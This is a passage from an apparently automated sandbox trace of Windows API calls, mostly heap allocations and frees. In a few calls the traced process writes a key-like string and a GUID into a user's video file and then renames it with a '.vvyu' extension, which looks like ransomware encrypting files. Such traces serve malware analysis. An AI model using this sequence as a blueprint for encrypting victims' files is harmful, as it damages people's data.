Size=0x18) returned 0x2c85d88 [0202.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea36f8 [0202.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0202.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0202.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0202.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0202.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0202.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0202.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0202.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.841] GetCurrentThreadId () returned 0x66c [0202.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea9708 [0202.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.842] GetCurrentThreadId () returned 0x66c [0202.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3758 [0202.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36f8 [0202.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0202.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3710 [0202.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0202.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36e0 [0202.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3770 [0202.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0202.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3740 [0202.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3728 [0202.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3788 [0202.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0202.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3728 [0202.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0202.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0202.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0202.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36f8 [0202.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0202.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0202.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0202.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0202.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0202.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0202.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0202.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0202.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0202.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1d50 | out: hHeap=0x620000) returned 1 [0202.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.854] WriteFile (in: hFile=0x510, lpBuffer=0x2e902a0*, nNumberOfBytesToWrite=0x125f, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e902a0*, lpNumberOfBytesWritten=0x312fb14*=0x125f, lpOverlapped=0x0) returned 1 [0202.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a0 | out: hHeap=0x620000) returned 1 [0202.855] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x1264, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.855] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.856] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.857] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.857] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.857] CloseHandle (hObject=0x510) returned 1 [0202.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0202.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0202.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0202.859] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\rfES3vfWf3fsY6Sx.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\zpv7u7xpwr7qk\\rfes3vfwf3fsy6sx.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\rfES3vfWf3fsY6Sx.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\zpv7u7xpwr7qk\\rfes3vfwf3fsy6sx.flv.vvyu")) returned 1 [0202.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.861] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0202.864] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x708ab330, ftCreationTime.dwHighDateTime=0x1d8a09c, ftLastAccessTime.dwLowDateTime=0x2b94c1f0, ftLastAccessTime.dwHighDateTime=0x1d8a522, ftLastWriteTime.dwLowDateTime=0x2b94c1f0, ftLastWriteTime.dwHighDateTime=0x1d8a522, nFileSizeHigh=0x0, nFileSizeLow=0x1264, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rfES3vfWf3fsY6Sx.flv", cAlternateFileName="RFES3V~1.FLV")) returned 0 [0202.864] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0202.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0202.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0202.865] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0202.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0202.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0202.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e918d8 | out: hHeap=0x620000) returned 1 [0202.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0202.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0202.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0202.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e917a8 | out: hHeap=0x620000) returned 1 [0202.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb48c8 | out: hHeap=0x620000) returned 1 [0202.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0202.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0202.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0202.868] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0202.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0202.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: 